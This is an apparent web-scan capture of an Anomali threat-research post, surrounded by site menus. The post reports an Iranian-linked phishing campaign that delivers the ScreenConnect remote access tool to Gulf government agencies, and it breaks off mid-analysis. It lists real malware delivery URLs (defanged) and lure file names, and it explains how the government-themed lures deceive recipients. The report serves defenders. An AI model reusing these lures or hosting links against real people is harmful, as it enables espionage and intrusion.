www.anomali.com Open in urlscan Pro
52.17.119.105  Public Scan

URL: https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-ua...
Submission: On April 24 via manual from US — Scanned from DE

Form analysis 4 forms found in the DOM

Name: email-formGET

<form id="email-form" name="email-form" data-name="Email Form" method="get" data-wf-page-id="657dc50a96389eee4e83bf78" data-wf-element-id="e1723ccf-20ab-dbed-37ae-2f32b8abc42a" aria-label="Email Form"><select id="languageSelect" name="Language"
    data-name="Language" class="w-select"></select></form>

Name: email-formGET

<form id="email-form" name="email-form" data-name="Email Form" method="get" data-wf-page-id="657dc50a96389eee4e83bf78" data-wf-element-id="f71d4004-5f1a-f0a9-f5b8-1cf1189320cc" aria-label="Email Form"><select id="languageSelect" name="Language"
    data-name="Language" class="w-select"></select></form>

Name: wf-form-Cookie-PreferencesGET

<form id="cookie-preferences" name="wf-form-Cookie-Preferences" data-name="Cookie Preferences" method="get" class="fs-cc-prefs_form" data-wf-page-id="657dc50a96389eee4e83bf78" data-wf-element-id="e8a67574-5734-4533-b9a6-d30826116373"
  aria-label="Cookie Preferences">
  <div fs-cc="close" class="fs-cc-prefs_close">
    <div class="fs-cc-prefs_close-icon w-embed"><svg fill="currentColor" aria-hidden="true" focusable="false" viewBox="0 0 16 24">
        <path d="M9.414 8l4.293-4.293-1.414-1.414L8 6.586 3.707 2.293 2.293 3.707 6.586 8l-4.293 4.293 1.414 1.414L8 9.414l4.293 4.293 1.414-1.414L9.414 8z"></path>
      </svg></div>
  </div>
  <div class="fs-cc-prefs_content">
    <div class="fs-cc-prefs_space-small">
      <div class="fs-cc-prefs_title font-family-beatrice">Privacy Preference Center</div>
    </div>
    <div class="fs-cc-prefs_space-small">
      <div class="fs-cc-prefs_text">Our website uses cookies to enhance your experience. Some cookies are essential for basic functionality, while others are used for marketing, analytics, and personalization. You can choose to disable certain types
        of storage that are not necessary, but this may affect your website experience.</div>
    </div>
    <div class="fs-cc-prefs_space-medium"><a fs-cc="deny" href="#" class="fs-cc-prefs_button fs-cc-button-alt w-button">Reject all cookies</a><a fs-cc="allow" href="#" class="fs-cc-prefs_button w-button">Allow all cookies</a></div>
    <div class="fs-cc-prefs_space-small">
      <div class="fs-cc-prefs_title font-family-beatrice">Manage Consent Preferences by Category</div>
    </div>
    <div class="fs-cc-prefs_option">
      <div class="fs-cc-prefs_toggle-wrapper">
        <div class="fs-cc-prefs_label font-family-beatrice">Essential</div>
        <div class="fs-cc-prefs_text"><strong>Always Active</strong></div>
      </div>
      <div class="fs-cc-prefs_text">These are required to enable basic website functionality.</div>
    </div>
    <div class="fs-cc-prefs_option">
      <div class="fs-cc-prefs_toggle-wrapper">
        <div class="fs-cc-prefs_label font-family-beatrice">Analytics</div><label class="w-checkbox fs-cc-prefs_checkbox-field"><input type="checkbox" id="analytics" name="Analytics" data-name="Analytics" fs-cc-checkbox="analytics"
            class="w-checkbox-input fs-cc-prefs_checkbox"><span for="Analytics" class="fs-cc-prefs_checkbox-label w-form-label">Essential</span>
          <div class="fs-cc-prefs_toggle"></div>
        </label>
      </div>
      <div class="fs-cc-prefs_text">These help us understand how the website performs, how visitors interact with the site, and whether there may be technical issues.</div>
    </div>
    <div class="fs-cc-prefs_option">
      <div class="fs-cc-prefs_toggle-wrapper">
        <div class="fs-cc-prefs_label font-family-beatrice">Marketing</div><label class="w-checkbox fs-cc-prefs_checkbox-field"><input type="checkbox" id="marketing" name="Marketing" data-name="Marketing" fs-cc-checkbox="marketing"
            class="w-checkbox-input fs-cc-prefs_checkbox"><span for="Marketing" class="fs-cc-prefs_checkbox-label w-form-label">Essential</span>
          <div class="fs-cc-prefs_toggle"></div>
        </label>
      </div>
      <div class="fs-cc-prefs_text">We use these to deliver advertising that is more relevant to you and your interests. We also use them to limit the number of times you see an advertisement and measure the effectiveness of advertising campaigns.
      </div>
    </div>
    <div class="fs-cc-prefs_option">
      <div class="fs-cc-prefs_toggle-wrapper">
        <div class="fs-cc-prefs_label font-family-beatrice">Personalization</div><label class="w-checkbox fs-cc-prefs_checkbox-field"><input type="checkbox" id="Personalization" name="Personalization" data-name="Personalization"
            fs-cc-checkbox="personalization" class="w-checkbox-input fs-cc-prefs_checkbox"><span for="Personalization" class="fs-cc-prefs_checkbox-label w-form-label">Essential</span>
          <div class="fs-cc-prefs_toggle"></div>
        </label>
      </div>
      <div class="fs-cc-prefs_text">These items allow the us to remember choices you make (such as your user name, language, or the region you are in) and provide enhanced, more personal features.</div>
    </div>
    <div class="fs-cc-prefs_buttons-wrapper"><a fs-cc="submit" href="#" class="fs-cc-prefs_button w-button">Confirm my preferences and close</a></div><input type="submit" data-wait="Please wait..." class="fs-cc-prefs_submit-hide w-button"
      value="Submit">
    <div class="w-embed">
      <style>
        /* smooth scrolling on iOS devices */
        .fs-cc-prefs_content {
          -webkit-overflow-scrolling: touch
        }
      </style>
    </div>
  </div>
</form>

Name: wf-form-Cookie-PreferencesGET

<form id="cookie-preferences" name="wf-form-Cookie-Preferences" data-name="Cookie Preferences" method="get" class="fs-cc-prefs_form" data-wf-page-id="657dc50a96389eee4e83bf78" data-wf-element-id="e8a67574-5734-4533-b9a6-d30826116373"
  aria-label="Cookie Preferences">
  <div fs-cc="close" class="fs-cc-prefs_close">
    <div class="fs-cc-prefs_close-icon w-embed"><svg fill="currentColor" aria-hidden="true" focusable="false" viewBox="0 0 16 24">
        <path d="M9.414 8l4.293-4.293-1.414-1.414L8 6.586 3.707 2.293 2.293 3.707 6.586 8l-4.293 4.293 1.414 1.414L8 9.414l4.293 4.293 1.414-1.414L9.414 8z"></path>
      </svg></div>
  </div>
  <div class="fs-cc-prefs_content">
    <div class="fs-cc-prefs_space-small">
      <div class="fs-cc-prefs_title font-family-beatrice">Privacy Preference Center</div>
    </div>
    <div class="fs-cc-prefs_space-small">
      <div class="fs-cc-prefs_text">Our website uses cookies to enhance your experience. Some cookies are essential for basic functionality, while others are used for marketing, analytics, and personalization. You can choose to disable certain types
        of storage that are not necessary, but this may affect your website experience.</div>
    </div>
    <div class="fs-cc-prefs_space-medium"><a fs-cc="deny" href="#" class="fs-cc-prefs_button fs-cc-button-alt w-button">Reject all cookies</a><a fs-cc="allow" href="#" class="fs-cc-prefs_button w-button">Allow all cookies</a></div>
    <div class="fs-cc-prefs_space-small">
      <div class="fs-cc-prefs_title font-family-beatrice">Manage Consent Preferences by Category</div>
    </div>
    <div class="fs-cc-prefs_option">
      <div class="fs-cc-prefs_toggle-wrapper">
        <div class="fs-cc-prefs_label font-family-beatrice">Essential</div>
        <div class="fs-cc-prefs_text"><strong>Always Active</strong></div>
      </div>
      <div class="fs-cc-prefs_text">These are required to enable basic website functionality.</div>
    </div>
    <div class="fs-cc-prefs_option">
      <div class="fs-cc-prefs_toggle-wrapper">
        <div class="fs-cc-prefs_label font-family-beatrice">Analytics</div><label class="w-checkbox fs-cc-prefs_checkbox-field"><input type="checkbox" id="analytics" name="Analytics" data-name="Analytics" fs-cc-checkbox="analytics"
            class="w-checkbox-input fs-cc-prefs_checkbox"><span for="Analytics" class="fs-cc-prefs_checkbox-label w-form-label">Essential</span>
          <div class="fs-cc-prefs_toggle"></div>
        </label>
      </div>
      <div class="fs-cc-prefs_text">These help us understand how the website performs, how visitors interact with the site, and whether there may be technical issues.</div>
    </div>
    <div class="fs-cc-prefs_option">
      <div class="fs-cc-prefs_toggle-wrapper">
        <div class="fs-cc-prefs_label font-family-beatrice">Marketing</div><label class="w-checkbox fs-cc-prefs_checkbox-field"><input type="checkbox" id="marketing" name="Marketing" data-name="Marketing" fs-cc-checkbox="marketing"
            class="w-checkbox-input fs-cc-prefs_checkbox"><span for="Marketing" class="fs-cc-prefs_checkbox-label w-form-label">Essential</span>
          <div class="fs-cc-prefs_toggle"></div>
        </label>
      </div>
      <div class="fs-cc-prefs_text">We use these to deliver advertising that is more relevant to you and your interests. We also use them to limit the number of times you see an advertisement and measure the effectiveness of advertising campaigns.
      </div>
    </div>
    <div class="fs-cc-prefs_option">
      <div class="fs-cc-prefs_toggle-wrapper">
        <div class="fs-cc-prefs_label font-family-beatrice">Personalization</div><label class="w-checkbox fs-cc-prefs_checkbox-field"><input type="checkbox" id="Personalization" name="Personalization" data-name="Personalization"
            fs-cc-checkbox="personalization" class="w-checkbox-input fs-cc-prefs_checkbox"><span for="Personalization" class="fs-cc-prefs_checkbox-label w-form-label">Essential</span>
          <div class="fs-cc-prefs_toggle"></div>
        </label>
      </div>
      <div class="fs-cc-prefs_text">These items allow the us to remember choices you make (such as your user name, language, or the region you are in) and provide enhanced, more personal features.</div>
    </div>
    <div class="fs-cc-prefs_buttons-wrapper"><a fs-cc="submit" href="#" class="fs-cc-prefs_button w-button">Confirm my preferences and close</a></div><input type="submit" data-wait="Please wait..." class="fs-cc-prefs_submit-hide w-button"
      value="Submit">
    <div class="w-embed">
      <style>
        /* smooth scrolling on iOS devices */
        .fs-cc-prefs_content {
          -webkit-overflow-scrolling: touch
        }
      </style>
    </div>
  </div>
</form>

Text Content

Discover
Blog
Support
PRODUCTS

Marketplace

Resources

Partners

Company

LANGUAGE

English
Español
Français
Italiano
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.
Schedule A Demo
Discover
PRODUCTS

Marketplace

Resources

Partners

Company


Discover
Blog
Support
PRODUCTS
The Anomali Platform

The industry-leading AI-Powered solution elevating your security operations and
defense capabilities in one platform. We consolidate your tech stack; give you
never before seen speed scale and performance at less cost, empower your team,
and help retain them. Simply different.

Threat Intelligence Management

Anomali Threatstream


The external landscape: From data to insights in minutes.


Anomali Intelligence Channels

Your curated intelligence: Accelerate your time to protection.


Detection and Response

Anomali Security Analytics


Big data security analytics: Threat detection across all of your digital assets
at a fraction of the cost.


Security Automation

Anomali Copilot


Immediate, correlated insight: Search petabytes of data in seconds.


Integrator

Automate response: Transform risk insights into real-time protections.

MARKETPLACE
The Anomali Marketplace

A unique cybersecurity marketplace providing instant access to a growing catalog
of threat intelligence providers, integration partners, and threat analysis
tools.

Marketplace Offerings

Threat Intelligence Feeds


Trial and purchase threat intelligence feeds from Anomali partners – find the
right intelligence for your organization, industry, geography, threat type, and
more.

Threat Analysis Tools and Enrichments

Gain the tools to pivot quickly from one piece of information to look up other
sources of data to get a complete picture of a threat – all one click away.

For Partners

Security System Partners

Anomali seamlessly integrates with many Security and IT systems to
operationalize threat intelligence.cost.

Marketplace for Partners

The Anomali Technology Partner Program provides technology partners everything
they need to develop innovative and differentiated product and service
integrations that complement Anomali’s solution portfolio designed to stop
breaches and attackers.

RESOURCES
Libraries
Resources

Upcoming and on-demand webinars, brochures and datasheets, industry reports and
white papers, case studies, and more.

Events

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor
incididunt amet

Detect LIVE

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor
incididunt amet

AI Automation

What is Security Analytics?

What is SOAR?

What is Threat Exposure Management?
Security Analytics

What is Security Analytics?

What is SOAR?

What is Threat Exposure Management?

What is Threat Detection, Investigation, and Response?
Threat Intelligence

What is Threat Intelligence?

Threat Intelligence Sharing

What is a Threat Intelligence Platform?
What is a Cyber Fusion Center?
Security Frameworks

What Are STIX/TAXII?
What is MITRE ATTACK?
PARTNERS
Sell Anomali

Anomali offers compelling margins, competitive partner support, and new revenue
opportunities for partners looking to help their customers boost the efficacy of
security infrastructure, improve security visibility and automate operations
while saving costs

Partners Overview
Integrate with Anomali


We believe that creating and investing in an ecosystem of technology partners is
imperative in delivering better business outcomes for our customers. Sharing
threat intelligence and insights across ISACs, ISAOs, and other communities also
depend on this collaboration.


Join the Technology Partner Program

Anomali SDKs

Threat Intel Sharing

Partner Portal


The Anomali Partner Portal is a place to register new sales opportunities and
access Anomali resources.

Partner Program

COMPANY
About Us

Anomali is the leader in modernizing security operations with the power of
analytics, intelligence, automation, and AI to deliver breakthrough levels of
 visibility, threat detection and response, and cyber exposure management.

Leadership
Careers
Press Room
Awards
Reviews
Contact Us
Schedule a Demo


Products

The Anomali Platform

The industry-leading AI-Powered solution elevating your security operations and
defense capabilities in one platform. We consolidate your tech stack; give you
never before seen speed scale and performance at less cost, empower your team,
and help retain them. Simply different.

Security Automation
Anomali Copilot

Immediate, correlated insight: Search petabytes of data in seconds.

Integrator

Automate response: Transform risk insights into real-time protections.

Detection and Response
Anomali Security Analytics

Big data security analytics: Threat detection across all of your digital assets
at a fraction of the cost.

Threat Intelligence Management
Anomali ThreatStream

The external landscape: From data to insights in minutes.

Anomali Intelligence Channels

Your curated intelligence: Accelerate your time to protection.

Marketplace

The Anomali Marketplace

A unique cybersecurity marketplace providing instant access to a growing catalog
of threat intelligence providers, integration partners, and threat analysis
tools.

Marketplace Offerings
Threat Intelligence Feeds

Trial and purchase threat intelligence feeds from Anomali partners – find the
right intelligence for your organization, industry, geography, threat type, and
more.

Threat Analysis Tools and Enrichments

Gain the tools to pivot quickly from one piece of information to look up other
sources of data to get a complete picture of a threat – all one click away.

For Partners
Security System Partners

Anomali seamlessly integrates with many Security and IT systems to
operationalize threat intelligence.cost.

Marketplace for Partners

The Anomali Technology Partner Program provides technology partners everything
they need to develop innovative and differentiated product and service
integrations that complement Anomali’s solution portfolio designed to stop
breaches and attackers.

Resources

Libraries
Resources

Upcoming and on-demand webinars, brochures and datasheets, industry reports and
white papers, case studies, and more.

Events

Join Anomali for any of our online or in-person events throughout the year to
learn how we can help you achieve your cyber security goals. We'd love to see
you online or 
in-person!

AI Automation
What is Copilot?
Threat Intelligence
What is Threat Intelligence?
Threat Intelligence Sharing
What is a Threat Intelligence Platform?
What is a Cyber Fusion Center?
Security Analytics
What is Security Analytics?
What is SOAR?
What is Threat Exposure Management?
What is Threat Detection, Investigation, and Response?
The Evolution and Future of SIEM
Security Frameworks
What Are STIX/TAXII?
What is MITRE ATTACK?
Free Tools
STAXX

STAXX gives you an easy way to access any STIX/TAXII feed.

Partners

Sell Anomali

Anomali offers compelling margins, competitive partner support, and new revenue
opportunities for partners looking to help their customers boost the efficacy of
security infrastructure, improve security visibility and automate operations
while saving costs.

Partners Overview
Integrate with Anomali

We believe that creating and investing in an ecosystem of technology partners is
imperative in delivering better business outcomes for our customers. Sharing
threat intelligence and insights across ISACs, ISAOs, and other communities also
depend on this collaboration.

Join the Technology Partner Program
Anomali SDKs
Threat Intel Sharing
Partner Portal

The Anomali Partner Portal is a place to register new sales opportunities and
access Anomali resources.

Partner Program
Company

About Us

Anomali is a revolutionary AI-Powered Security Operations Platform that is the
first and only solution to bring together security operations and defense
capabilities into one proprietary cloud-native big data solution.

Leadership
Careers
Press Room
Reviews
Awards
Contact Us
Schedule a Demo
Schedule A Demo
en

English
Español
Français
Italiano


Discover
PRODUCTS

Marketplace

Resources

Partners

Company


Blog
Support
LANGUAGE

English
Español
Français
Italiano
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.
Schedule Demo

Discover
PRODUCTS

Marketplace

Resources

Partners

Company


Discover
Blog
Support
The Anomali Platform

Transform security operations with disruptive security analytics. Go from
business risk to cyber actions in minutes. Amplify your visibility, automate
your workflows, and optimize your cyber stack.

Do more. With less.


Learn More

BACK TO MENU

Exposure Management

ATTACK SURFACE MANAGEMENT


Your risk surface: Where are you at risk of exposure?



DIGITAL RISK PROTECTION

Your compromise: What have the attackers already taken from you?


Threat Intelligence Management

Threatstream


The external landscape: From data to insights in minutes.



Anomali Intelligence Channels

Your curated intelligence: Accelerate your time to protection.


Detection and Response

MATCH


Big data security analytics: Threat detection across all of your digital assets
at a fraction of the cost.


Security Automation

copilot


Immediate, correlated insight: Search petabytes of data in seconds.



Lens


Automate intel gathering: Extract intelligence insights from unstructured data.



Integrator

Automate response: Transform risk insights into real-time protections.


The Anomali Marketplace

A unique cybersecurity marketplace providing instant access to a growing catalog
of threat intelligence providers, integration partners, and threat analysis
tools.


Learn More

BACK TO MENU

Marketplace Offerings

Threat Intelligence Feeds


Trial and purchase threat intelligence feeds from Anomali partners – find the
right intelligence for your organization, industry, geography, threat type, and
more.


Threat Analysis Tools & Enrichments

Gain the tools to pivot quickly from one piece of information to look up other
sources of data to get a complete picture of a threat – all one click away.



Security System Partners


Anomali seamlessly integrates with many Security and IT systems to
operationalize threat intelligence.


For Partners

Marketplace for Partners


The Anomali Technology Partner Program provides technology partners everything
they need to develop innovative and differentiated product and service
integrations that complement Anomali’s solution portfolio designed to stop
breaches and attackers.


Resources

Upcoming and on-demand webinars, brochures and datasheets, industry reports and
white papers, case studies, and more.


Browse Library

BACK TO MENU

Threat Intelligence


what is threat intelligence?

THREAT INTELLIGENCE SHARING

WHAT IS A THREAT INTELLIGENCE PLATFORM (TIP)?


WHAT IS A CYBER FUSION CENTER?

Analytics


what is SECURITY ANALYTICS?

WHAT IS SOAR?

What is Threat Exposure Management?

What is Threat Detection, Investigation, and Response?


The Evolution and Future of SIEM
Security Frameworks

WHAT ARE STIX/TAXII?


WHAT IS MITRE ATTACK?

Free Tools

Anomali Cyber Watch


A weekly intelligence digest from Anomali Threat Research.


STAXX

STAXX gives you an easy way to access any STIX/TAXII feed.



The Anomali Newsletter


Get a monthly summary of Anomali threat intelligence content, research, news,
events, and more.


Sell Anomali

Anomali offers compelling margins, competitive partner support, and new revenue
opportunities for partners looking to help their customers boost the efficacy of
security infrastructure, improve security visibility and automate operations
while saving costs


Partners Overview

BACK TO MENU

Integrate with Anomali


We believe that creating and investing in an ecosystem of technology partners is
imperative in delivering better business outcomes for our customers. Sharing
threat intelligence and insights across ISACs, ISAOs, and other communities also
depend on this collaboration.


Join the Technology Partner Program

Anomali SDKs

Threat Intel Sharing

Partner Portal


The Anomali Partner Portal is a place to register new sales opportunities and
access Anomali resources.


Partner Portal Login

About Anomali

Anomali is the leader in modernizing security operations with the power of
analytics, intelligence, automation, and AI to deliver breakthrough levels of
 visibility, threat detection and response, and cyber exposure management.


Learn More

BACK TO MENU

Anomali at Work

Anomali Press room

Events

Detect Live

Leadership

Reviews


Awards
Get in Touch

Contact US

Request a Demo


Careers



Products

The Anomali Platform

Transform security operations with disruptive security analytics. Go from
business risk to cyber actions in minutes. Amplify your visibility, automate
your workflows, and optimize your cyber stack.


Do more. With less.

Exposure
Management

Attack Surface Management



Your risk surface: Where are you at risk of exposure?


Digital Risk Protection



Your compromise: What have the attackers already taken from you?


Threat Intelligence
Management

ThreatStream



The external landscape: From data to insights in minutes.


Anomali Intelligence Channels



Your curated intelligence: Accelerate your time to protection.


Detection and
Response

Anomali Security Analytics



Big data security analytics: Threat detection across all of your digital assets
at a fraction of the cost.



Security
Automation

Copilot



Immediate, correlated insight: Search petabytes of data in seconds.


Lens



Automate intel gathering: Extract intelligence insights from unstructured data.


Integrator



Automate response: Transform risk insights into real-time protections.


Marketplace

The Anomali Marketplace

A unique cybersecurity marketplace providing instant access to a growing catalog
of threat intelligence providers, integration partners, and threat analysis
tools.


Learn More

MARKETPLACE OFFERINGS

Threat Intelligence Feeds



Trial and purchase threat intelligence feeds from Anomali partners – find the
right intelligence for your organization, industry, geography, threat type, and
more.


Threat Analysis Tools & Enrichments



Gain the tools to pivot quickly from one piece of information to look up other
sources of data to get a complete picture of a threat – all one click away.


FOR PARTNERS

Security System Partners



Anomali seamlessly integrates with many Security and IT systems to
operationalize threat intelligence.cost.


Marketplace for Partners



The Anomali Technology Partner Program provides technology partners everything
they need to develop innovative and differentiated product and service
integrations that complement Anomali’s solution portfolio designed to stop
breaches and attackers.


Resources

Resources

Upcoming and on-demand webinars, brochures and datasheets, industry reports and
white papers, case studies, and more.


Browse Library

THREAT INTELLIGENCE

What is Threat Intelligence?


Threat Intelligence Sharing


What is a Threat Intelligence Platform (TIP)?


What is a Cyber Fusion Center?


ANALYTICS

What is Security Analytics?


What is SOAR?


What is Threat Exposure Management?


What is Threat Detection, Investigation, and Response?


The Evolution and Future of SIEM


security FRAMEWORKS

What Are STIX/TAXII?


What is MITRE ATTACK?


FREE TOOLS

Anomali Cyber Watch



A weekly intelligence digest from Anomali Threat Research.


STAXX



STAXX gives you an easy way to access any STIX/TAXII feed.


The Anomali Newsletter



Get a monthly summary of Anomali threat intelligence content, research, news,
events, and more.


Partners

Sell Anomali

Anomali offers compelling margins, competitive partner support, and new revenue
opportunities for partners looking to help their customers boost the efficacy of
security infrastructure, improve security visibility and automate operations
while saving costs


Partners Overview

INTEGRATE WITH ANOMALI


We believe that creating and investing in an ecosystem of technology partners is
imperative in delivering better business outcomes for our customers. Sharing
threat intelligence and insights across ISACs, ISAOs, and other communities also
depend on this collaboration.


Join the Technology Partner Program


Anomali SDKs


Threat Intel Sharing


Partner PORTAL


The Anomali Partner Portal is a place to register new sales opportunities and
access Anomali resources.


Partner Program


Company

About Anomali

Anomali is the leader in modernizing security operations with the power of
analytics, intelligence, automation, and AI to deliver breakthrough levels of
 visibility, threat detection and response, and cyber exposure management.


Learn More

ANOMALI AT WORK


Anomali Press Room

Events


Detect LIVE


Leadership


Reviews


Awards


GET IN TOUCH

Contact Us


Request a Demo


Careers


Schedule Demo

en

English
Español
Français
Italiano


February 10, 2021
-
Anomali Threat Research
,



PROBABLE IRANIAN CYBER ACTORS, STATIC KITTEN, CONDUCTING CYBERESPIONAGE CAMPAIGN
TARGETING UAE AND KUWAIT GOVERNMENT AGENCIES


Research
<h3>ScreenConnect Remote Access Tool Utilizing Ministry of Foreign
Affairs-Themed EXEs and URLs</h3> <p><em>Authored by: Gage Mele, Winston
Marydasan, and Yury Polozov</em></p> <h2>Key Findings</h2> <ul> <li>Anomali
Threat Research identified a campaign targeting government agencies in the
United Arab Emirates (UAE) and likely the broader Middle East.</li> <li>We
assess with medium confidence that the activity is being conducted by Iran-nexus
cyberespionage group Static Kitten, due to Israeli geopolitical-themed lures,
Ministry of Foreign Affairs (MOFA) references, and the use of file-storage
service Onehub that was attributed to their previous campaign known as Operation
Quicksand.<sup>[1]</sup></li> <li>The objective of this activity is to install a
remote management tool called ScreenConnect (acquired by ConnectWise 2015) with
unique launch parameters that have custom properties.</li> <li>Malicious
executables and URLs used in this campaign are masquerading as the Ministry of
Foreign Affairs (MOFA) of Kuwait (mofa.gov[.]kw).</li> <li>Another sample,
including only MOFA (mfa.gov), could be used for broader government
targeting.</li> </ul> <h2>Overview</h2> <p>Anomali Threat Research has uncovered
malicious activity very likely attributed to the Iran-nexus cyberespionage
group, Static Kitten (Seedworm, MERCURY, Temp.Zagros, POWERSTATS, NTSTATS,
MuddyWater), which is known to target numerous sectors primarily located in the
Middle East.<sup>[2]</sup> This new campaign, which uses tactics, techniques,
and procedures (TTPs) consistent with previous Static Kitten activity, uses
ScreenConnect launch parameters designed to target any MOFA with
<strong>mfa[.]gov</strong> as part of the custom field. We found samples
specifically masquerading as the Kuwaiti government and the UAE National Council
respectively, based on references in the malicious samples.</p> <p>In mid-2020,
the UAE and Israel began the process of normalizing relations. Since then,
tensions have further escalated in the region, as reported by numerous sources.
The targeting of Kuwait could be tied to multiple factors, including Kuwait’s
MOFA making a public statement that they were willing to lead mediation between
Iran and Saudi Arabia.<sup>[3]</sup> Furthermore, in October 2020, trade numbers
for a peace deal between Israel and UAE included an estimate for the creation of
15,000 jobs and $2 billion in revenue on each side.<sup>[4]</sup> In that same
month, Static Kitten reportedly conducted Operation Quicksand, which targeted
prominent Israeli organizations and included the use of file-storage service
OneHub.<sup>[5]</sup></p> <h2>Details</h2> <p>We identified two lure ZIP files
being used by Static Kitten designed to trick users into downloading a purported
report on relations between Arab countries and Israel, or a file relating to
scholarships. The URLs distributed through these phishing emails direct
recipients to the intended file storage location on Onehub, a legitimate service
known to be used by Static Kitten for nefarious purposes.[6] Anomali Threat
Research has identified that Static Kitten is continuing to use Onehub to host a
file containing ScreenConnect.</p> <p>The delivery URLs found to be part of this
campaign are:</p> <ul> <li>ws.onehub[.]com/files/7w1372el</li>
<li>ws.onehub[.]com/files/94otjyvd</li> </ul> <p>File names in this campaign
include:</p> <ul> <li>تحليل ودراسة تطبيع العلاقات الدول العربية واسرائيل
httpsmod[.]gov.kw.ZIP</li> <li>تحليل ودراسة تطبيع العلاقات الدول العربية
واسرائيل httpsmod[.]gov.kw.exe</li> <li>الدراسیة .zip</li> <li>الدراسیة
.exe</li> <li>مشروع .docx</li> </ul> <p>Translated file names</p> <ul>
<li>Analysis and study of the normalization of relations between the Arab
countries and Israel httpsmod.gov.kw.zip</li> <li>Analysis and study of the
normalization of relations between the Arab countries and Israel
httpsmod.gov.kw.exe</li> <li>Scholarships.zip</li> <li>Scholarships.exe</li>
<li>Project.docx</li> </ul> <p>Static Kitten’s objective is to direct users to a
downloader URL (<strong>ws.onehub[.]com/files/7w1372el</strong> which downloads
a ZIP file) via a phishing email that impersonates an EXE (<strong>تحليل ودراسة
تطبيع العلاقات الدول العربية واسرائيل httpsmod[.]gov.kw.exe</strong>). This EXE
purports to be a report on Arabic countries and Israel relations but, when
executed, actually launches the installation process for ScreenConnect.</p> <p>A
similar second sample uses .docx file that tries to direct users to
<strong>ws.onehub[.]com/files/94otjyvd</strong> which downloads a ZIP file
called <strong>لدراسیة .zip</strong>. An EXE inside the ZIP of the same name
will also begin the ScreenConnect installation process when executed. An
overview of the infection chain is shown in Figure 1below.</p> <p
style="text-align: center;"><em><strong><img alt="Static Kitten Campaign
Infection Chain"
src="https://cdn.filestackcontent.com/qoDoJNyyRbmVT4P2Ordu"/><br/> Figure
1</strong> - Static Kitten Campaign Infection Chain</em></p> <h3>Lure Document
Analysis</h3> <p>Static Kitten is distributing at least two URLs that deliver
two different ZIP files that are themed to be relevant to government agency
employees. The URLs are distributed through phishing emails with lure and decoy
documents. An example lure is shown in Figure 2 below.</p> <p style="text-align:
center;"><em><strong><img alt="Static Kitten Lure Document"
src="https://cdn.filestackcontent.com/9taUbRQcTcGEQYAYxR1i"/><br/> Figure
2</strong> – Static Kitten Lure Document .docx</em></p> <p>The .docx file shown
in Figure 2 directly refers to government agency recipients while highlighting
concerns about recent Iranian actions, the impact of the US elections, and joint
studies by government entities on relations between Arabic countries and Israel.
The actors reference multiple official agencies, including the General
Secretariat of the Cooperation Council for the Arab States of the Gulf and the
UAE National Media Council, likely in an effort to add the appearance of
legitimacy. A full translation of this document can be viewed in Appendix A. The
hyperlink in the .docx file is impersonating the UAE National Media Council,
however, the actual link directs to
<strong>ws.onehub.com/files/7w1372el</strong>.</p> <p>The second file is a ZIP
called الدراسیة .zip (see Figure 3). We cannot determine the delivery method for
this ZIP, but it is likely similar to the .docx email delivery method of the
first download URL. The geopolitical-themed ZIP contains an EXE file with the
same name that begins the installation process for ScreenConnect when executed
(see Figure 4).</p> <p style="text-align: center;"><em><strong><img
alt="Download URL ws.onehub.com/files/94otjyvd for Malicious ZIP الدراسیة .zip"
src="https://cdn.filestackcontent.com/JSr3TyJBQJisFMwSeyTa"/><br/> Figure
3</strong> – Download URL <strong>ws.onehub.com/files/94otjyvd</strong> for
Malicious ZIP <strong>الدراسیة .zip</strong></em></p> <p style="text-align:
center;"><em><strong><img alt="ScreenConnect Installation"
src="https://cdn.filestackcontent.com/HLvJBIh5Tp6JP05cEbNw"/><br/> Figure
4</strong> - ScreenConnect Installation</em></p> <h2>Technical Analysis</h2>
<h3>ScreenConnect and OneHub Context</h3> <p>Between 2016 and 2020, we have
seenScreenConnect and Onehub used in malicious cyber activity by different,
unassociated threat actors. For example, between 2016 and 2019 unknown threat
actors targeted IT outsourcing firms, including compromising US-based Cognizant
and India-based Wipro.<sup>[7]</sup> The actors responsible for these attacks
used ScreenConnect to connect to endpoints on client networks, enabling them to
conduct further lateral movements and automated actions on objectives. During an
incident impacting Cognizant and their client Maritz Holdings, actors used
ScreenConnect to propagate to other connected systems and caused over $1.8
million (USD) in losses through a gift card fraud scheme.<sup>[6]</sup> In 2019,
another threat group used ConnectWise to execute PowerShell commands in their
target environments. This lead to the delivery of Zeppelin and other VegaLocker
ransomware variants, Vidar information stealer, Cobalt Strike beacons, PS2EXE
tools, and banker Trojans.[7] In 2020, ScreenConnect/ConnectWise has been
utilized by the cybercriminal group Pinchy Spider (GOLD SOUTHFIELD, GOLD GARDEN,
Sodinokibi, REvil, GandCrab) to distribute Sodinokibi
ransomware.<sup>[8]</sup></p> <p>Remote desktop management software is a common
target and tool used by threat actors because of the wide variety of
functionalities they offer. ScreenConnect offers three primary functions that
each contain different valuable features for threat actors. ScreenConnect’s
capabilities are shown in Table 1 below.</p> <p style="text-align:
center;"><em><strong>Table 1</strong> - ScreenConnect
Capabilities</em><sup>[9]</sup></p> <table class="table table-striped"> <thead>
<tr> <th>Feature</th> <th>Functions</th> </tr> </thead> <tbody> <tr> <td>Remote
Support</td> <td>Remote control and viewing of any internet-connect device.</td>
</tr> <tr> <td>Unattended Access</td> <td>Persistent connection allows
behind-the-scenes, remote control of any machine or server.</td> </tr> <tr>
<td>Meetings</td> <td>Standard screen-sharing meetings with chat and voice
communication, record video, and take screenshots.</td> </tr> </tbody> </table>
<p>The cybercriminal group Graceful Spider (TA505, Gold Evergreen, TEMP.Warlock,
Hive0065, Chimborazo, FIN11) distributed spearphishing emails impersonating
Onehub in 2019 in attempts to trick users into downloading the SDBbot remote
access trojan (RAT).[10] Onehub’s file-storage services are also utilized in
malspam emails to host various malware, as is common with other file storage
locations abused by multiple threat actors.</p> <h3>First Executable</h3>
<p>تحليل ودراسة تطبيع العلاقات الدول العربية واسرائيل httpsmod.gov.kw.exe</p>
<p>When a user tries to double click the executable <strong>تحليل ودراسة تطبيع
العلاقات الدول العربية واسرائيل httpsmod.gov.kw.exe</strong> (Screenconnect
payload), it drops the Microsoft installer file. This begins the installation of
the client payload onto victim machines. While the actors attempted to make the
installation appear legitimate, closer inspection of the client launch
parameters reveals the potential for broader MOFA targeting. The client service
